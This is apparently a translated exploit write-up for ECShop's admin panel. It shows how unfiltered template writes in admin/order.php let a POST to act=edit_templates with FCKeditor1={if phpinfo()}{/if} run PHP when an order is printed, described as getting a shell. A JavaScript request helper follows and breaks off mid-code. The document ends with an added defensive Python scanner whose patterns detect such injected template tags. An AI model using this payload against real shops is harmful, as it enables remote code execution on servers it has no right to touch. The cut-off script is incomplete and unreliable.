ECSHOP admin backend getshell

admin/order.php

[php]
elseif ($_REQUEST['act'] == 'edit_templates')
{
    /* Update the contents of the template file */
    $file_name = @fopen('../' . DATA_DIR . '/order_print.html', 'w+');
    // Writes the template out unfiltered; as soon as any page renders this template you get a shell
    echo '../' . DATA_DIR . '/order_print.html';
    echo stripslashes($_POST['FCKeditor1']);
    @fwrite($file_name, stripslashes($_POST['FCKeditor1']));
    @fclose($file_name);

    /* Status message */
    $link[] = array('text' => $_LANG['back_list'], 'href' => 'order.php?act=list');
    sys_msg($_LANG['edit_template_success'], 0, $link);
}
elseif ($_REQUEST['act'] == 'info')
{
    // ... several lines omitted ...
    assign_query_info();
    $smarty->display('order_info.htm');
}
}
[/php]

The POST body is written verbatim into data/order_print.html, and the template engine compiles tags such as `{if phpinfo()}` into PHP whenever that template is rendered. So we first submit

127.0.0.1/ec/admin/order.php?act=edit_templates

with the POST body

FCKeditor1={if phpinfo()}{/if}

then open any order and click "print", and we have a shell.

(screenshots: ecshop1, ecshop2)

Attached is a JavaScript snippet (the original is cut off here):

[php]
var request = false;
if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if (window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
                    'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
                    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for (var i = 0; i
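As an added defensive check (this is not code from the original post or from ECShop): a scanner a defender can run over data/order_print.html, or over any template file written through the admin panel, that flags exactly what the write-up relies on, namely function calls inside Smarty-style `{...}` tags, `{php}`-type block tags and raw `<?` tags. The sample template below is constructed for the example.

```python
"""Flag template constructs that execute PHP when rendered."""
import re

TAG_RE = re.compile(r"\{([^{}]+)\}")          # one {...} tag, no nesting
CALL_RE = re.compile(r"\b[A-Za-z_]\w*\s*\(")  # name( -> a function call
BLOCK_TAGS = {"php", "include_php", "insert"}  # tags that run PHP directly


def scan_template(text):
    """Return (line_number, reason, snippet) for every suspicious construct.

    Deliberately conservative: a CSS rule such as `a { background: url(x) }`
    also trips CALL_RE, which is acceptable for a file that should only
    contain order fields like {$order.order_sn}.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if "<?" in line:  # raw PHP (or short) open tag written into the template
            findings.append((lineno, "raw PHP open tag", line.strip()))
        for m in TAG_RE.finditer(line):
            body = m.group(1).strip()
            # tag name: first word, ignoring a leading "/" of a closing tag
            name = body.lstrip("/").split(None, 1)[0] if body else ""
            if name in BLOCK_TAGS:
                findings.append((lineno, "PHP block tag {%s}" % name, m.group(0)))
            elif CALL_RE.search(body):
                findings.append((lineno, "function call inside tag", m.group(0)))
    return findings


def is_clean(text):
    return not scan_template(text)


# Constructed sample: a plausible order_print.html fragment, plus the
# injected tag from the write-up and a raw PHP tag on the following line.
SAMPLE = """<html>
<body>
<p>Order: {$order.order_sn}</p>
{foreach from=$goods item=g}<li>{$g.name}</li>{/foreach}
{if phpinfo()}{/if}
<?php echo 1; ?>
</body>
</html>"""

if __name__ == "__main__":
    for lineno, reason, snippet in scan_template(SAMPLE):
        print("line %d: %s: %s" % (lineno, reason, snippet))
```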
